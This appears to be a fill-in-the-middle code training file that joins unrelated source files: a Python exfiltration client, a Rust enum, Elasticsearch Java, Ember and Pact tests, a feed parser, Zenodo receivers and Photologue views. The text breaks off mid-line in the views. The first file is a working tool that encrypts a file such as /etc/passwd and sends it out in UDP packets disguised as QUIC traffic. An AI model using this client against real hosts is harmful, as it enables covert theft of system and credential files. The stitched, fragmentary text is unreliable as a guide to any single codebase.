<|file_name|>quic_client.py<|end_file_name|><|fim▁begin|>import sys import time import socket import struct import random import hashlib import urllib2 from Crypto import Random from Crypto.Cipher import AES # from itertools import izip_longest # Setting timeout so that we won't wait forever timeout = 2 socket.setdefaulttimeout(timeout) limit = 256*256*256*256 - 1 def md5(fname): hash_md5 = hashlib.md5() with open(fname, "rb") as f: for chunk in iter(lambda: f.read(4096), b""): hash_md5.update(chunk) return hash_md5.hexdigest() def chunkstring(s, n): return [ s[i:i+n] for i in xrange(0, len(s), n) ] class AESCipher(object): def __init__(self, key): self.bs = 32 self.key = hashlib.sha256(key.encode()).digest() def encrypt(self, raw): raw = self._pad(raw) iv = Random.new().read(AES.block_size) cipher = AES.new(self.key, AES.MODE_CBC, iv) return iv + cipher.encrypt(raw) def decrypt(self, enc): # enc = base64.b64decode(enc) iv = enc[:AES.block_size] cipher = AES.new(self.key, AES.MODE_CBC, iv) return self._unpad(cipher.decrypt(enc[AES.block_size:])).decode('utf-8') def _pad(self, s): return s + (self.bs - len(s) % self.bs) * chr(self.bs - len(s) % self.bs) @staticmethod def _unpad(s): return s[:-ord(s[len(s)-1:])] class QUICClient(): def __init__(self, host, key, port=443, max_size=4096): # Params for all class self.host = host self.port = port self.max_size = max_size - 60 self.AESDriver = AESCipher(key=key) self.serv_addr = (host, port) # Class Globals self.max_packets = 255 # Limitation by QUIC itself. self._genSeq() # QUIC Sequence is used to know that this is the same sequence, # and it's a 20 byte long that is kept the same through out the # session and is transfered hex encoded. self.delay = 0.1 self.sock = None if self._createSocket() is 1: # Creating a UDP socket object sys.exit(1) self.serv_addr = (self.host, self.port) # Creating socket addr format def _genSeq(self): self.raw_sequence = random.getrandbits(64) parts = [] while self.raw_sequence: parts.append(self.raw_sequence & limit) self.raw_sequence >>= 32 self.sequence = struct.pack('<' + 'L'*len(parts), *parts) # struct.unpack('<LL', '\xb1l\x1c\xb1\x11"\x10\xf4') return 0 def _createSocket(self): try: sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) self.sock = sock return 0 except socket.error as e: sys.stderr.write("[!]\tFailed to create a UDP socket.\n%s.\n" % e) return 1 def _getQUICHeader(self, count): if type(count) is not hex: try: count_id = chr(count) except: sys.stderr.write("Count must be int or hex.\n") return 1 else: count_id = count if count > self.max_packets: sys.stderr.write("[-]\tCount must be maximum of 255.\n") return 1 header = "\x0c" # Public Flags header += self.sequence # Adding CID header += count_id # Packet Count return header def _getFileContent(self, file_path): try: f = open(file_path, 'rb') data = f.read() f.close() sys.stdout.write("[+]\tFile '%s' was loaded for exfiltration.\n" % file_path) return data except IOError, e: sys.stderr.write("[-]\tUnable to read file '%s'.\n%s.\n" % (file_path, e)) return 1 def sendFile(self, file_path): # Get File content data = self._getFileContent(file_path) if data == 1: return 1 # Check that the file is not too big. if len(data) > (self.max_packets * self.max_size): sys.stderr.write("[!]\tFile is too big for export.\n") return 1 # If the file is not too big, start exfiltration # Exfiltrate first packet md5_sum = md5(file_path) # Get MD5 sum of file packets_count = (len(data) / self.max_size)+1 # Total packets first_packet = self._getQUICHeader(count=0) # Get header for first file r_data = "%s;%s;%s" % (file_path, md5_sum, packets_count) # First header r_data = self.AESDriver.encrypt(r_data) # Encrypt data self.sock.sendto(first_packet + r_data, self.serv_addr) # Send the data sys.stdout.write("[+]\tSent initiation packet.\n") # encrypted_content = self.AESDriver.encrypt(data)<|fim▁hole|> # Encrypt the Chunks raw_dat = "" chunks = [] while data: raw_dat += data[:self.max_size] enc_chunk = self.AESDriver.encrypt(data[:self.max_size]) print len(enc_chunk) chunks.append(enc_chunk) data = data[self.max_size:] i = 1 for chunk in chunks: this_data = self._getQUICHeader(count=i) this_data += chunk self.sock.sendto(this_data, self.serv_addr) time.sleep(self.delay) sys.stdout.write("[+]\tSent chunk %s/%s.\n" % (i, packets_count)) i += 1 sys.stdout.write("[+]\tFinished sending file '%s' to '%s:%s'.\n" % (file_path, self.host, self.port)) # self.sequence = struct.pack('<' + 'L'*len(parts), *parts) return 0 def close(self): time.sleep(0.1) self.sock.close() return 0 if __name__ == "__main__": client = QUICClient(host='127.0.0.1', key="123", port=443) # Setup a server a = struct.unpack('<LL', client.sequence) # Get CID used a = (a[1] << 32) + a[0] sys.stdout.write("[.]\tExfiltrating with CID: %s.\n" % a) client.sendFile("/etc/passwd") # Exfil File client.close() # Close<|fim▁end|>
<|file_name|>hint_metrics.rs<|end_file_name|><|fim▁begin|>//! Describe font hint metrics /// Specifies whether to hint font metrics; hinting font metrics means quantizing them so that they are integer values in device space. Doing this improves the consistency of letter and line spacing, however it also means that text will be laid out differently at different zoom factors. /// /// Since 1.0 #[repr(i32)] pub enum HintMetrics { /// Hint metrics in the default manner for the font backend and target device, since 1.0 Default = 0, /// Do not hint font metrics, since 1.0 Off = 1, /// Hint font metrics, since 1.0 On = 2<|fim▁hole|>}<|fim▁end|>
<|file_name|>UpdateProcessAction.java<|end_file_name|><|fim▁begin|>/* * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one * or more contributor license agreements. Licensed under the Elastic License * 2.0; you may not use this file except in compliance with the Elastic License * 2.0. */ package org.elasticsearch.xpack.core.ml.action; import org.elasticsearch.action.ActionType; import org.elasticsearch.action.support.tasks.BaseTasksResponse; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.common.io.stream.Writeable; import org.elasticsearch.common.xcontent.StatusToXContentObject; import org.elasticsearch.rest.RestStatus; import org.elasticsearch.xcontent.XContentBuilder; import org.elasticsearch.xpack.core.ml.job.config.JobUpdate; import org.elasticsearch.xpack.core.ml.job.config.MlFilter; import org.elasticsearch.xpack.core.ml.job.config.ModelPlotConfig; import org.elasticsearch.xpack.core.ml.job.config.PerPartitionCategorizationConfig; import java.io.IOException; import java.util.List; import java.util.Objects; public class UpdateProcessAction extends ActionType<UpdateProcessAction.Response> { public static final UpdateProcessAction INSTANCE = new UpdateProcessAction(); public static final String NAME = "cluster:internal/xpack/ml/job/update/process"; private UpdateProcessAction() { super(NAME, UpdateProcessAction.Response::new); } public static class Response extends BaseTasksResponse implements StatusToXContentObject, Writeable { private final boolean isUpdated; public Response() { super(null, null); this.isUpdated = true; } public Response(StreamInput in) throws IOException { super(in); isUpdated = in.readBoolean(); } @Override public void writeTo(StreamOutput out) throws IOException { super.writeTo(out); out.writeBoolean(isUpdated); } public boolean isUpdated() { return isUpdated; } @Override public RestStatus status() { return RestStatus.ACCEPTED; } @Override public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException { builder.startObject(); builder.field("updated", isUpdated); builder.endObject(); return builder; } @Override public int hashCode() { return Objects.hashCode(isUpdated); } @Override public boolean equals(Object obj) {<|fim▁hole|> } if (getClass() != obj.getClass()) { return false; } Response other = (Response) obj; return this.isUpdated == other.isUpdated; } } public static class Request extends JobTaskRequest<Request> { private ModelPlotConfig modelPlotConfig; private PerPartitionCategorizationConfig perPartitionCategorizationConfig; private List<JobUpdate.DetectorUpdate> detectorUpdates; private MlFilter filter; private boolean updateScheduledEvents = false; public Request(StreamInput in) throws IOException { super(in); modelPlotConfig = in.readOptionalWriteable(ModelPlotConfig::new); perPartitionCategorizationConfig = in.readOptionalWriteable(PerPartitionCategorizationConfig::new); if (in.readBoolean()) { detectorUpdates = in.readList(JobUpdate.DetectorUpdate::new); } filter = in.readOptionalWriteable(MlFilter::new); updateScheduledEvents = in.readBoolean(); } @Override public void writeTo(StreamOutput out) throws IOException { super.writeTo(out); out.writeOptionalWriteable(modelPlotConfig); out.writeOptionalWriteable(perPartitionCategorizationConfig); boolean hasDetectorUpdates = detectorUpdates != null; out.writeBoolean(hasDetectorUpdates); if (hasDetectorUpdates) { out.writeList(detectorUpdates); } out.writeOptionalWriteable(filter); out.writeBoolean(updateScheduledEvents); } public Request( String jobId, ModelPlotConfig modelPlotConfig, PerPartitionCategorizationConfig perPartitionCategorizationConfig, List<JobUpdate.DetectorUpdate> detectorUpdates, MlFilter filter, boolean updateScheduledEvents ) { super(jobId); this.modelPlotConfig = modelPlotConfig; this.perPartitionCategorizationConfig = perPartitionCategorizationConfig; this.detectorUpdates = detectorUpdates; this.filter = filter; this.updateScheduledEvents = updateScheduledEvents; } public ModelPlotConfig getModelPlotConfig() { return modelPlotConfig; } public PerPartitionCategorizationConfig getPerPartitionCategorizationConfig() { return perPartitionCategorizationConfig; } public List<JobUpdate.DetectorUpdate> getDetectorUpdates() { return detectorUpdates; } public MlFilter getFilter() { return filter; } public boolean isUpdateScheduledEvents() { return updateScheduledEvents; } @Override public int hashCode() { return Objects.hash( getJobId(), modelPlotConfig, perPartitionCategorizationConfig, detectorUpdates, filter, updateScheduledEvents ); } @Override public boolean equals(Object obj) { if (obj == null) { return false; } if (getClass() != obj.getClass()) { return false; } Request other = (Request) obj; return Objects.equals(getJobId(), other.getJobId()) && Objects.equals(modelPlotConfig, other.modelPlotConfig) && Objects.equals(perPartitionCategorizationConfig, other.perPartitionCategorizationConfig) && Objects.equals(detectorUpdates, other.detectorUpdates) && Objects.equals(filter, other.filter) && Objects.equals(updateScheduledEvents, other.updateScheduledEvents); } } }<|fim▁end|>
if (obj == null) { return false;
<|file_name|>events_test.js<|end_file_name|><|fim▁begin|>module('system/props/events_test'); test('listener should receive event - removing should remove', function() { var obj = {}, count = 0; var F = function() { count++; }; Ember.addListener(obj, 'event!', F); equal(count, 0, 'nothing yet'); Ember.sendEvent(obj, 'event!'); equal(count, 1, 'received event'); Ember.removeListener(obj, 'event!', F); count = 0; Ember.sendEvent(obj, 'event!'); equal(count, 0, 'received event'); }); test('listeners should be inherited', function() { var obj = {}, count = 0; var F = function() { count++; }; Ember.addListener(obj, 'event!', F); var obj2 = Ember.create(obj); equal(count, 0, 'nothing yet'); Ember.sendEvent(obj2, 'event!'); equal(count, 1, 'received event'); Ember.removeListener(obj2, 'event!', F); count = 0; Ember.sendEvent(obj2, 'event!'); equal(count, 0, 'did not receive event'); Ember.sendEvent(obj, 'event!'); equal(count, 1, 'should still invoke on parent'); }); test('adding a listener more than once should only invoke once', function() { var obj = {}, count = 0; var F = function() { count++; }; Ember.addListener(obj, 'event!', F); Ember.addListener(obj, 'event!', F); Ember.sendEvent(obj, 'event!'); equal(count, 1, 'should only invoke once'); }); test('adding a listener with a target should invoke with target', function() { var obj = {}, target; target = { count: 0, method: function() { this.count++; } }; Ember.addListener(obj, 'event!', target, target.method); Ember.sendEvent(obj, 'event!'); equal(target.count, 1, 'should invoke'); }); test('suspending a listener should not invoke during callback', function() { var obj = {}, target, otherTarget; target = { count: 0, method: function() { this.count++; } }; otherTarget = { count: 0, method: function() { this.count++; } }; Ember.addListener(obj, 'event!', target, target.method); Ember.addListener(obj, 'event!', otherTarget, otherTarget.method); function callback() { equal(this, target); Ember.sendEvent(obj, 'event!'); return 'result'; } Ember.sendEvent(obj, 'event!'); equal(Ember._suspendListener(obj, 'event!', target, target.method, callback), 'result'); Ember.sendEvent(obj, 'event!'); equal(target.count, 2, 'should invoke'); equal(otherTarget.count, 3, 'should invoke'); }); test('adding a listener with string method should lookup method on event delivery', function() { var obj = {}, target; target = { count: 0, method: function() {} }; Ember.addListener(obj, 'event!', target, 'method'); Ember.sendEvent(obj, 'event!'); equal(target.count, 0, 'should invoke but do nothing'); target.method = function() { this.count++; }; Ember.sendEvent(obj, 'event!'); equal(target.count, 1, 'should invoke now'); }); test('calling sendEvent with extra params should be passed to listeners', function() { var obj = {}, params = null; Ember.addListener(obj, 'event!', function() { params = Array.prototype.slice.call(arguments); }); Ember.sendEvent(obj, 'event!', ['foo', 'bar']); deepEqual(params, ['foo', 'bar'], 'params should be saved'); }); test('implementing sendEvent on object should invoke', function() { var obj = { sendEvent: function(eventName, params) { equal(eventName, 'event!', 'eventName'); deepEqual(params, ['foo', 'bar']); this.count++; }, count: 0 }; Ember.addListener(obj, 'event!', obj, function() { this.count++; }); Ember.sendEvent(obj, 'event!', ['foo', 'bar']);<|fim▁hole|> equal(obj.count, 2, 'should have invoked method & listener'); }); test('hasListeners tells you if there are listeners for a given event', function() { var obj = {}, F = function() {}, F2 = function() {}; equal(Ember.hasListeners(obj, 'event!'), false, 'no listeners at first'); Ember.addListener(obj, 'event!', F); Ember.addListener(obj, 'event!', F2); equal(Ember.hasListeners(obj, 'event!'), true, 'has listeners'); Ember.removeListener(obj, 'event!', F); equal(Ember.hasListeners(obj, 'event!'), true, 'has listeners'); Ember.removeListener(obj, 'event!', F2); equal(Ember.hasListeners(obj, 'event!'), false, 'has no more listeners'); Ember.addListener(obj, 'event!', F); equal(Ember.hasListeners(obj, 'event!'), true, 'has listeners'); }); test('calling removeListener without method should remove all listeners', function() { var obj = {}, F = function() {}, F2 = function() {}; equal(Ember.hasListeners(obj, 'event!'), false, 'no listeners at first'); Ember.addListener(obj, 'event!', F); Ember.addListener(obj, 'event!', F2); equal(Ember.hasListeners(obj, 'event!'), true, 'has listeners'); Ember.removeListener(obj, 'event!'); equal(Ember.hasListeners(obj, 'event!'), false, 'has no more listeners'); }); test('while suspended, it should not be possible to add a duplicate listener', function() { var obj = {}, target; target = { count: 0, method: function() { this.count++; } }; Ember.addListener(obj, 'event!', target, target.method); function callback() { Ember.addListener(obj, 'event!', target, target.method); } Ember.sendEvent(obj, 'event!'); Ember._suspendListener(obj, 'event!', target, target.method, callback); equal(target.count, 1, 'should invoke'); equal(Ember.meta(obj).listeners['event!'].length, 1, "a duplicate listener wasn't added"); // now test _suspendListeners... Ember.sendEvent(obj, 'event!'); Ember._suspendListeners(obj, ['event!'], target, target.method, callback); equal(target.count, 2, 'should have invoked again'); equal(Ember.meta(obj).listeners['event!'].length, 1, "a duplicate listener wasn't added"); });<|fim▁end|>
<|file_name|>feed_parse_extractSpearpointtranslationsHomeBlog.py<|end_file_name|><|fim▁begin|>def extractSpearpointtranslationsHomeBlog(item): ''' Parser for 'spearpointtranslations.home.blog' ''' vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title']) if not (chp or vol) or "preview" in item['title'].lower(): return None tagmap = [ ('Record of the Missing Sect Master', 'Record of the Missing Sect Master', 'translated'), ('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel'), ] for tagname, name, tl_type in tagmap: if tagname in item['tags']: return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type) <|fim▁hole|> return False<|fim▁end|>
<|file_name|>receivers.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*- # ## This file is part of Zenodo. ## Copyright (C) 2012, 2013, 2014 CERN. ## ## Zenodo is free software: you can redistribute it and/or modify ## it under the terms of the GNU General Public License as published by ## the Free Software Foundation, either version 3 of the License, or ## (at your option) any later version. ## ## Zenodo is distributed in the hope that it will be useful, ## but WITHOUT ANY WARRANTY; without even the implied warranty of ## MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the ## GNU General Public License for more details. ## ## You should have received a copy of the GNU General Public License ## along with Zenodo. If not, see <http://www.gnu.org/licenses/>. ## ## In applying this licence, CERN does not waive the privileges and immunities ## granted to it by virtue of its status as an Intergovernmental Organization ## or submit itself to any jurisdiction. import os import shutil from flask import current_app from invenio.base.factory import with_app_context @with_app_context(new_context=True) def post_handler_database_create(sender, default_data='', *args, **kwargs): """Load data after demosite creation.""" from invenio.modules.communities.models import Community print(">>> Creating collections for communities...") c = Community.query.filter_by(id='zenodo').first() c.save_collections() c = Community.query.filter_by(id='ecfunded').first() c.save_collections() print(">>> Fixing dbquery for root collection.") from invenio.modules.search.models import Collection from invenio.ext.sqlalchemy import db c = Collection.query.filter_by(id=1).first() c.dbquery = '980__a:0->Z AND NOT 980__a:PROVISIONAL AND NOT ' \ '980__a:PENDING AND NOT 980__a:SPAM AND NOT 980__a:REJECTED ' \ 'AND NOT 980__a:DARK' db.session.commit() @with_app_context(new_context=True) def clean_data_files(sender, *args, **kwargs): """Clean data in directories.""" dirs = [ current_app.config['DEPOSIT_STORAGEDIR'], current_app.config['CFG_TMPDIR'], current_app.config['CFG_TMPSHAREDDIR'], current_app.config['CFG_LOGDIR'], current_app.config['CFG_CACHEDIR'], current_app.config['CFG_RUNDIR'], current_app.config['CFG_BIBDOCFILE_FILEDIR'], ] for d in dirs: print(">>> Cleaning {0}".format(d))<|fim▁hole|> shutil.rmtree(d) os.makedirs(d) @with_app_context(new_context=True) def post_handler_demosite_populate(sender, default_data='', *args, **kwargs): """Load data after records are created."""<|fim▁end|>
if os.path.exists(d):
<|file_name|>tests.rs<|end_file_name|><|fim▁begin|>use std::panic::catch_unwind; use std::sync::Arc; use env_logger::*; use expectest::expect; use expectest::prelude::*; use maplit::*; use serde_json::json; use pact_consumer::*; use pact_consumer::prelude::*; use pact_models::Consumer; use pact_models::pact::Pact; use pact_models::PACT_RUST_VERSION; use pact_models::provider_states::*; use pact_models::sync_interaction::RequestResponseInteraction; use pact_models::sync_pact::RequestResponsePact; use crate::callback_executors::HttpRequestProviderStateExecutor; use crate::pact_broker::Link; use crate::PactSource; use super::{execute_state_change, filter_consumers, filter_interaction, FilterInfo}; #[test] fn if_no_interaction_filter_is_defined_returns_true() { let interaction = RequestResponseInteraction::default(); expect!(filter_interaction(&interaction, &FilterInfo::None)).to(be_true()); } #[test] fn if_an_interaction_filter_is_defined_returns_false_if_the_description_does_not_match() { let interaction = RequestResponseInteraction { description: "bob".to_string(), .. RequestResponseInteraction::default() }; expect!(filter_interaction(&interaction, &FilterInfo::Description("fred".to_string()))).to(be_false()); } #[test] fn if_an_interaction_filter_is_defined_returns_true_if_the_description_does_match() { let interaction = RequestResponseInteraction { description: "bob".to_string(), .. RequestResponseInteraction::default() }; expect!(filter_interaction(&interaction, &FilterInfo::Description("bob".to_string()))).to(be_true()); } #[test] fn uses_regexs_to_match_the_description() { let interaction = RequestResponseInteraction { description: "bobby".to_string(), .. RequestResponseInteraction::default() }; expect!(filter_interaction(&interaction, &FilterInfo::Description("bob.*".to_string()))).to(be_true()); } #[test] fn if_an_interaction_state_filter_is_defined_returns_false_if_the_state_does_not_match() { let interaction = RequestResponseInteraction { provider_states: vec![ ProviderState::default(&"bob".to_string()) ], .. RequestResponseInteraction::default() }; expect!(filter_interaction(&interaction, &FilterInfo::State("fred".to_string()))).to(be_false()); } #[test] fn if_an_interaction_state_filter_is_defined_returns_true_if_the_state_does_match() { let interaction = RequestResponseInteraction { provider_states: vec![ ProviderState::default(&"bob".to_string()) ], .. RequestResponseInteraction::default() }; expect!(filter_interaction(&interaction, &FilterInfo::State("bob".to_string()))).to(be_true()); } #[test] fn uses_regexs_to_match_the_state() { let interaction = RequestResponseInteraction { provider_states: vec![ ProviderState::default(&"bobby".to_string()) ], .. RequestResponseInteraction::default() }; expect!(filter_interaction(&interaction, &FilterInfo::State("bob.*".to_string()))).to(be_true()); } #[test] fn if_the_state_filter_is_empty_returns_false_if_the_interaction_state_is_defined() { let interaction = RequestResponseInteraction { provider_states: vec![ ProviderState::default(&"bobby".to_string()) ], .. RequestResponseInteraction::default() }; expect!(filter_interaction(&interaction, &FilterInfo::State("".to_string()))).to(be_false()); } #[test] fn if_the_state_filter_is_empty_returns_true_if_the_interaction_state_is_not_defined() { let interaction = RequestResponseInteraction { provider_states: vec![], .. RequestResponseInteraction::default() }; expect!(filter_interaction(&interaction, &FilterInfo::State("".to_string()))).to(be_true()); } #[test] fn if_the_state_filter_and_interaction_filter_is_defined_must_match_both() { let interaction = RequestResponseInteraction { description: "freddy".to_string(), provider_states: vec![ ProviderState::default(&"bobby".to_string()) ], .. RequestResponseInteraction::default() }; expect!(filter_interaction(&interaction, &FilterInfo::DescriptionAndState(".*ddy".to_string(), "bob.*".to_string()))).to(be_true()); } #[test] fn if_the_state_filter_and_interaction_filter_is_defined_is_false_if_the_provider_state_does_not_match() { let interaction = RequestResponseInteraction { description: "freddy".to_string(), provider_states: vec![ ProviderState::default(&"boddy".to_string()) ], .. RequestResponseInteraction::default() }; expect!(filter_interaction(&interaction, &FilterInfo::DescriptionAndState(".*ddy".to_string(), "bob.*".to_string()))).to(be_false()); } #[test] fn if_the_state_filter_and_interaction_filter_is_defined_is_false_if_the_description_does_not_match() { let interaction = RequestResponseInteraction { description: "frebby".to_string(), provider_states: vec![ ProviderState::default(&"bobby".to_string()) ], .. RequestResponseInteraction::default() }; expect!(filter_interaction(&interaction, &FilterInfo::DescriptionAndState(".*ddy".to_string(), "bob.*".to_string()))).to(be_false()); } #[test] fn if_the_state_filter_and_interaction_filter_is_defined_is_false_if_both_do_not_match() { let interaction = RequestResponseInteraction { description: "joe".to_string(), provider_states: vec![ ProviderState::default(&"author".to_string()) ], .. RequestResponseInteraction::default() }; expect!(filter_interaction(&interaction, &FilterInfo::DescriptionAndState(".*ddy".to_string(), "bob.*".to_string()))).to(be_false()); } #[test] fn if_no_consumer_filter_is_defined_returns_true() { let consumers = vec![]; let result = Err("".to_string()); expect!(filter_consumers(&consumers, &result)).to(be_true()); } #[test] fn if_a_consumer_filter_is_defined_returns_false_if_the_consumer_name_does_not_match() { let consumers = vec!["fred".to_string(), "joe".to_string()]; let result = Ok((Box::new(RequestResponsePact { consumer: Consumer { name: "bob".to_string() }, .. RequestResponsePact::default() }) as Box<dyn Pact + Send + Sync>, None, PactSource::Unknown)); expect!(filter_consumers(&consumers, &result)).to(be_false()); } #[test] fn if_a_consumer_filter_is_defined_returns_true_if_the_result_is_an_error() { let consumers = vec!["fred".to_string(), "joe".to_string()]; let result = Err("".to_string()); expect!(filter_consumers(&consumers, &result)).to(be_true()); } #[test] fn if_a_consumer_filter_is_defined_returns_true_if_the_consumer_name_does_match() { let consumers = vec!["fred".to_string(), "joe".to_string(), "bob".to_string()]; let result = Ok((Box::new(RequestResponsePact { consumer: Consumer { name: "bob".to_string() }, .. RequestResponsePact::default() }) as Box<dyn Pact + Send + Sync>, None, PactSource::Unknown)); expect!(filter_consumers(&consumers, &result)).to(be_true()); } #[tokio::test] async fn test_state_change_with_parameters() { try_init().unwrap_or(()); let server = PactBuilder::new("RustPactVerifier", "SomeRunningProvider") .interaction("a state change request", "", |mut i| async move { i.request.method("POST"); i.request.path("/"); i.request.header("Content-Type", "application/json"); i.request.body("{\"params\":{\"A\":\"1\",\"B\":\"2\"},\"action\":\"setup\",\"state\":\"TestState\"}"); i.response.status(200); i }) .await .start_mock_server(); let provider_state = ProviderState { name: "TestState".to_string(), params: hashmap!{ "A".to_string() => json!("1"), "B".to_string() => json!("2") } }; let provider_state_executor = Arc::new(HttpRequestProviderStateExecutor { state_change_url: Some(server.url().to_string()), .. HttpRequestProviderStateExecutor::default() }); let client = reqwest::Client::new(); let result = execute_state_change(&provider_state, true, None, &client, provider_state_executor).await; expect!(result.clone()).to(be_ok()); } #[tokio::test] async fn test_state_change_with_parameters_in_query() { try_init().unwrap_or(()); let server = PactBuilder::new("RustPactVerifier", "SomeRunningProvider") .interaction("a state change request with params in the query string", "", |mut i| async move { i.comment("testing state change with parameters in the query"); i.test_name("test_state_change_with_parameters_in_query"); i.request.method("POST"); i.request.path("/"); i.request.query_param("state", "TestState"); i.request.query_param("action", "setup"); i.request.query_param("A", "1"); i.request.query_param("B", "2"); i.response.status(200); i }) .await .start_mock_server(); let provider_state = ProviderState { name: "TestState".to_string(), params: hashmap!{ "A".to_string() => json!("1"), "B".to_string() => json!("2") } }; let provider_state_executor = Arc::new(HttpRequestProviderStateExecutor { state_change_url: Some(server.url().to_string()), state_change_body: false, .. HttpRequestProviderStateExecutor::default() }); let client = reqwest::Client::new(); let result = execute_state_change(&provider_state, true, None, &client, provider_state_executor).await; expect!(result.clone()).to(be_ok()); } #[tokio::test] async fn test_state_change_returning_json_values() { try_init().unwrap_or(()); let server = PactBuilder::new("RustPactVerifier", "SomeRunningProvider") .interaction("a state change request which returns a map of values", "", |mut i| async move { i.request.method("POST"); i.request.path("/"); i.request.header("Content-Type", "application/json"); i.request.body("{\"action\":\"setup\",\"state\":\"TestState\",\"params\":{}}"); i.response.status(200); i.response.header("Content-Type", "application/json"); i.response.body("{\"a\": \"A\", \"b\": 100}"); i }) .await .start_mock_server(); let provider_state = ProviderState { name: "TestState".to_string(), params: hashmap!{} }; let provider_state_executor = Arc::new(HttpRequestProviderStateExecutor { state_change_url: Some(server.url().to_string()), .. HttpRequestProviderStateExecutor::default() }); let client = reqwest::Client::new(); let result = execute_state_change(&provider_state, true, None, &client, provider_state_executor).await; expect!(result.clone()).to(be_ok().value(hashmap! { "a".into() => json!("A"), "b".into() => json!(100) })); } #[test] fn publish_result_does_nothing_if_not_from_broker() { try_init().unwrap_or(()); let server_response = catch_unwind(|| { let runtime = tokio::runtime::Builder::new_current_thread() .enable_all() .build() .unwrap(); runtime.block_on(async { let _server = PactBuilder::new("RustPactVerifier", "PactBroker") .interaction("publish results", "", |mut i| async move { i.request.method("POST"); i.request.path("/"); i.response.status(201); i }) .await .start_mock_server(); let options = super::PublishOptions { provider_version: None, build_url: None, provider_tags: vec![],<|fim▁hole|> }) }); expect!(server_response).to(be_err()); } #[tokio::test] async fn publish_successful_result_to_broker() { try_init().unwrap_or(()); let server = PactBuilder::new("RustPactVerifier", "PactBroker") .interaction("publish results", "", |mut i| async move { i.request.method("POST"); i.request.path("/path/to/pact/verification"); i.request.json_body(json_pattern!({ "providerApplicationVersion": "1", "success": true, "testResults": [ { "interactionId": "1", "success": true } ], "verifiedBy": json!({ "implementation": "Pact-Rust", "version": PACT_RUST_VERSION }) })); i.response.status(201); i }) .await .start_mock_server(); let options = super::PublishOptions { provider_version: Some("1".into()), .. super::PublishOptions::default() }; let links = vec![ Link { name: "pb:publish-verification-results".to_string(), href: Some(server.path("/path/to/pact/verification".to_string()).to_string()), templated: false, title: None } ]; let source = PactSource::BrokerUrl("Test".to_string(), server.url().to_string(), None, links); super::publish_result(&vec![(Some("1".to_string()), Ok(()))], &source, &options).await; }<|fim▁end|>
.. super::PublishOptions::default() }; super::publish_result(&vec![], &PactSource::File("/tmp/test".into()), &options).await;
<|file_name|>views.py<|end_file_name|><|fim▁begin|>import warnings from django.views.generic.dates import ArchiveIndexView, DateDetailView, DayArchiveView, MonthArchiveView, \ YearArchiveView<|fim▁hole|> from .models import Photo, Gallery # Gallery views. class GalleryListView(ListView): queryset = Gallery.objects.on_site().is_public() paginate_by = 20 class GalleryDetailView(DetailView): queryset = Gallery.objects.on_site().is_public() class GalleryDateView(object): queryset = Gallery.objects.on_site().is_public() date_field = 'date_added' allow_empty = True class GalleryDateDetailView(GalleryDateView, DateDetailView): pass class GalleryArchiveIndexView(GalleryDateView, ArchiveIndexView): pass class GalleryDayArchiveView(GalleryDateView, DayArchiveView): pass class GalleryMonthArchiveView(GalleryDateView, MonthArchiveView): pass class GalleryYearArchiveView(GalleryDateView, YearArchiveView): make_object_list = True # Photo views. class PhotoListView(ListView): queryset = Photo.objects.on_site().is_public() paginate_by = 20 class PhotoDetailView(DetailView): queryset = Photo.objects.on_site().is_public() class PhotoDateView(object): queryset = Photo.objects.on_site().is_public() date_field = 'date_added' allow_empty = True class PhotoDateDetailView(PhotoDateView, DateDetailView): pass class PhotoArchiveIndexView(PhotoDateView, ArchiveIndexView): pass class PhotoDayArchiveView(PhotoDateView, DayArchiveView): pass class PhotoMonthArchiveView(PhotoDateView, MonthArchiveView): pass class PhotoYearArchiveView(PhotoDateView, YearArchiveView): make_object_list = True # Deprecated views. class DeprecatedMonthMixin(object): """Representation of months in urls has changed from a alpha representation ('jan' for January) to a numeric representation ('01' for January). Properly deprecate the previous urls.""" query_string = True month_names = {'jan': '01', 'feb': '02', 'mar': '03', 'apr': '04', 'may': '05', 'jun': '06', 'jul': '07', 'aug': '08', 'sep': '09', 'oct': '10', 'nov': '11', 'dec': '12', } def get_redirect_url(self, *args, **kwargs): print('a') warnings.warn( DeprecationWarning('Months are now represented in urls by numbers rather than by ' 'their first 3 letters. The old style will be removed in Photologue 3.4.')) class GalleryDateDetailOldView(DeprecatedMonthMixin, RedirectView): permanent = True def get_redirect_url(self, *args, **kwargs): super(GalleryDateDetailOldView, self).get_redirect_url(*args, **kwargs) return reverse('photologue:gallery-detail', kwargs={'year': kwargs['year'], 'month': self.month_names[kwargs['month']], 'day': kwargs['day'], 'slug': kwargs['slug']}) class GalleryDayArchiveOldView(DeprecatedMonthMixin, RedirectView): permanent = True def get_redirect_url(self, *args, **kwargs): super(GalleryDayArchiveOldView, self).get_redirect_url(*args, **kwargs) return reverse('photologue:gallery-archive-day', kwargs={'year': kwargs['year'], 'month': self.month_names[kwargs['month']], 'day': kwargs['day']}) class GalleryMonthArchiveOldView(DeprecatedMonthMixin, RedirectView): permanent = True def get_redirect_url(self, *args, **kwargs): super(GalleryMonthArchiveOldView, self).get_redirect_url(*args, **kwargs) return reverse('photologue:gallery-archive-month', kwargs={'year': kwargs['year'], 'month': self.month_names[kwargs['month']]}) class PhotoDateDetailOldView(DeprecatedMonthMixin, RedirectView): permanent = True def get_redirect_url(self, *args, **kwargs): super(PhotoDateDetailOldView, self).get_redirect_url(*args, **kwargs) return reverse('photologue:photo-detail', kwargs={'year': kwargs['year'], 'month': self.month_names[kwargs['month']], 'day': kwargs['day'], 'slug': kwargs['slug']}) class PhotoDayArchiveOldView(DeprecatedMonthMixin, RedirectView): permanent = True def get_redirect_url(self, *args, **kwargs): super(PhotoDayArchiveOldView, self).get_redirect_url(*args, **kwargs) return reverse('photologue:photo-archive-day', kwargs={'year': kwargs['year'], 'month': self.month_names[kwargs['month']], 'day': kwargs['day']}) class PhotoMonthArchiveOldView(DeprecatedMonthMixin, RedirectView): permanent = True def get_redirect_url(self, *args, **kwargs): super(PhotoMonthArchiveOldView, self).get_redirect_url(*args, **kwargs) return reverse('photologue:photo-archive-month', kwargs={'year': 